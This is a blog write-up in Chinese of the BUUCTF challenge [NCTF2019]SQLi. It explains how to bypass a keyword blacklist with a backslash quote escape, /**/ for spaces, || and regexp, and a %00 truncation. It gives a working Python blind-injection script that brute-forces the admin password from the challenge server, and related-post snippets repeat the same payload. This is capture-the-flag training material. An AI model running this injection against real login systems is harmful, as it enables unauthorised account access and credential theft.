[NCTF2019]SQLi

最新推荐文章于 2022-11-23 14:33:57 发布
最新推荐文章于 2022-11-23 14:33:57 发布
阅读量202 收藏
点赞数
分类专栏: CTF 文章标签: sql python regexp BUUCTF CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45646006/article/details/120251747
版权

[NCTF2019]SQLi

打开网页,提示:

try to make the sqlquery have its own results

登录键下提示:

sqlquery : select * from users where username='' and passwd=''

fuzz一下,注释符号,空格全被过滤了,这个是我的fuzz字典:

WEB SQL Fuzz Dict

dirsearch扫描一下网站,发现存在robots.txt文件,打开后提示有/hint.txt

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";

If $_POST['passwd'] === admin's password,

Then you will get the flag;

对一开始的查询语句

select * from users where username='' and passwd=''

作出修改:

select * from users where username='\' and passwd='||/**/passwd/**/regexp/**/"^a";%00'

References

[NCTF2019]SQLi

此时username变成\' and passwd=,这样肯定查不到,同时%00导致最后的引号被截断,所以真实的查询语句为:

select * from users where passwd regexp "^a";

^a的意思就是寻找以a开头的字符串,不断增长^后面的字符串就可以完整还原密码。

References

SQL学习笔记 – REGEXP

python脚本:

import requests
from urllib import parse
import string
url = 'http://e46eb35d-cdcf-48bf-b210-5d210b6bf11d.node4.buuoj.cn:81/'
result = ''
string= '_' + string.ascii_lowercase + string.digits #密码由小写字母 数字 下划线组成
while True:
    for j in string:
        data = {
            "username":"\\",
            "passwd":'||/**/passwd/**/regexp/**/"^{}";{}'.format((result+j),parse.unquote('%00'))
        }
        res = requests.post(url=url,data=data)
        if 'welcome' in res.text:
            result += j
            print("\r" + result, end="")
            break

parse.unquote()是解码%00的意思,防止%00本身被url编码。

References

刷题记录-[NCTF2019]SQLi_Arnoldqqq的博客-CSDN博客

运行结果:

you_will_never_know7788990

在网页随便输入一个用户名,载输入密码,就可以得到flag。

yym68686
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu-[NCTF2019]SQLi
qaq517384的博客
10-14 191
打开界面是一个有sql语句的登录框 老本行robots.txt发现有提示 $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i"; If $_POST['
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛是一项旨在推动我国高校电子信息类专业教学改革,提高学生动手能力和工程实践能力的重要赛事。这个.7z压缩包文件包含了自大赛创办以来,从第一届到第十四届的所有竞赛题目,对于参赛学生、...
[NCTF2019]SQLi --BUUCTF --详解
金 帛的博客
06-13 1297
BUUCTF记录贴
[NCTF2019]SQLi-1||SQL注入
sinat_40572875的博客
11-23 444
采用的是正则表达式来获取flag的值,因此这里在select等关键字被过滤的情况下,这里也可以使用正则表达式来匹配admin的密码进而来获取flag值,确定获取密码的方式之后就需要确定注入点,来使用正则表达式来逐步获取密码的值,这里想到了对name中的第二个字符进行转义,使后面的' and passwd=成为name的内容,payload:name:\,passwd:||/**/1;脚本可以适当的修改延时时间,如果使用时报错,那就从新跑一下或修改下延时时间。payload不要带上了空格,空格也被过滤了。
BUUCTF-[NCTF2019]SQLi
qq_24033605的博客
11-02 323
[NCTF2019]SQLi 进入页面,sql语句直接被甩在脸上,尝试万能密码登录: 这里有waf,先fuzzy一下: 过滤的东西有点多(真不愧sql语句能直接甩脸) 在robots.txt文件中有提示 再进入hint.txt 这里看到了黑名单,并且说要让我们查找admin的密码,但是admin在黑名单中,只能进行正则匹配了。 但是想在框框内进行正则不可能,单引号注释符全被过滤了。 sqlquery : select * from users where username='' and pass
[NCTF2019]SQLi 1&regexp注入
plant1234的博客
10-03 1317
发现为ture时返回Location: welcome.php。随便输入一个用户,用admin的密码登陆得到flag。并且当密码和admin密码相同时就能得到flag。可以利用bool盲注进行注入,爆破passwd。发现没有过滤 " 和 \。
刷题记录-[NCTF2019]SQLi
weixin_43610673的博客
05-09 2130
测试一下 应该是or被拦截了 简单fuzz一下 可以看到regexp是可以用的 题目也直接给了被过滤的关键词 找到admin的密码即可得flag 由于单引号被禁用,使用 \ 转义and前面的那个单引号,使得 '\' and passwd=' 形成闭合 构造passwd处为 ||/**/passwd/**/regexp/**/"^a";%00 用regexp查询passwd ^匹配字符串开头 %00截断后面的内容 但是不能在输入框直接提交,会被url encode 变为%2500被黑名单拦截.
BUUCTF--[NCTF2019]SQLi
qq_46263951的博客
07-14 419
首先我们在窗口中尝试一些闭合发现都被禁用了 通过使用御剑可以扫描到robots.txt文件,进入查看可以找到hint.txt文件 regexp正则注入 简单来说regexp用来匹配文本,不区分大小写,可以从头开始一位一位进行爆破 根据提示我们需要对passwd进行爆破,用户名可以任意 If $_POST['passwd'] === admin's password, Then you will get the flag; 空格由/**/,or可以用||代替 综上,我们可以大致构..
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
[NPUCTF2020]ezinclude
yym68686
10-17 2449
目录[NPUCTF2020]ezinclude方法一 利用php7 segment fault特性(CVE-2018-14884)方法二 利用 session.upload_progress 进行 session 文件包含 [NPUCTF2020]ezinclude 打开网页,查看源代码,发现注释提示: md5($secret.$name)===$pass 输入url: /?name=1 变化name的值,发现cookies的hash值在不断变化,说明hash值跟name的取值有关,但又不完全是name
BUUCTF Web 第一页全部Write ups
yym68686
03-26 1887
更多笔记,可以关注yym68686.top 目录[极客大挑战 2019]Http[ACTF2020 新生赛]Exec[极客大挑战 2019]Secret File[HCTF 2018]WarmUpReferences[极客大挑战 2019]EasySQLReferences[强网杯 2019]随便注方法一方法二References[极客大挑战 2019]Havefun[SUCTF 2019]EasySQL方法一方法二References[ACTF2020 新生赛]IncludeReferences[极客大挑
[WUSTCTF2020]CV Maker
yym68686
09-24 1571
[WUSTCTF2020]CV Maker 打开网页,先登录,发现可以更改头像,想到可能是文件上传漏洞,试一试上传PHP文件,发现页面报错:exif_imagetype not image!,查阅PHP手册: exif_imagetype (PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8) exif_imagetype — 判断一个图像的类型,exif_imagetype() 读取一个图像的第一个字节并检查其签名。 说明exif_imagetype只检查文件头,所以我们可以
[网鼎杯 2020 白虎组]PicDown
yym68686
10-31 1467
[网鼎杯 2020 白虎组]PicDown 打开网页发现输入文本框,有可能是读取文件,输入: ../../../../../etc/passwd 或者 /etc/passwd 文件用记事本打开后: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin s
BUUCTF Web 第二页全部Write ups
yym68686
07-09 1358
目录[强网杯 2019]高明的黑客[BUUCTF 2018]Online Tool[RoarCTF 2019]Easy Java[GXYCTF2019]BabyUpload[GXYCTF2019]禁止套娃方法一方法二方法三[BJDCTF2020]The mystery of ip[GWCTF 2019]我有一个数据库[BJDCTF2020]Mark loves cat[BJDCTF2020]ZJCTF,不过如此[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[De1CTF 201
[GYCTF2020]EasyThinking
yym68686
10-08 1207
[GYCTF2020]EasyThinking 输入url: /1 页面报错,提示:ThinkPHP V6.0.0 { 十年磨一剑-为API开发设计的高性能框架 } - 官方手册。 用dirsearch扫描发现www.zip源码泄露,使用命令: python dirsearch.py -u http://be2eaad1-b1cd-496a-9992-e5b410121b55.node4.buuoj.cn:81/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,4
nssctf的jwt问3
08-17
首先将图像的背景填充为白色。 2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值